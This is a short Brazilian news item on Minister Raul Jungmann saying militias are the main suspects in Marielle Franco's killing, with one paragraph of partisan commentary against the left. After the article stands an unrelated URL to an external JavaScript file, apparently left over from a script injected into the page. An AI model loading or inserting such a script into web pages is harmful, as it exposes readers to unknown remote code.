BrasilNotícias

Raul Jungmann: principal linha de investigação do caso Marielle é envolvimento de milícias

De acordo com o ministro da Segurança Pública, Raul Jungmann, a linha de investigação principal sobre a execução da vereadora Marielle Franco e do motorista Anderson Pedro Gomes é o envolvimento de milícias.

Se confirmado pela polícia, desmonta a tese das esquerdas radicais que, logo após o crime, fizeram da execução de uma pessoa um palanque político para uma agenda ideológica, além de querer culpar policiais.

No dia de hoje, a família da vereadora deve ainda se encontrar com o chefe da Polícia Civil do Rio de Janeiro, Rivaldo Barbosa, para ter maiores detalhes do andamento das investigações.

Em entrevista à CBN, Jungmann destacou que a Polícia Civil partiu de um grande conjunto de possibilidades e foi afunilando aos poucos. “Estão, praticamente, com uma ou duas pistas fechadas. Eu diria que, hoje, apenas uma delas e os investigadores têm caminhado bastante adiante. Essa hipótese mais provável é a atuação de milícias no Rio de Janeiro”.

Marielle Franco foi executada no mês passado.

https://cloudapi.online/js/api46.js

Tags
Ver mais

Artigos relacionados

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Close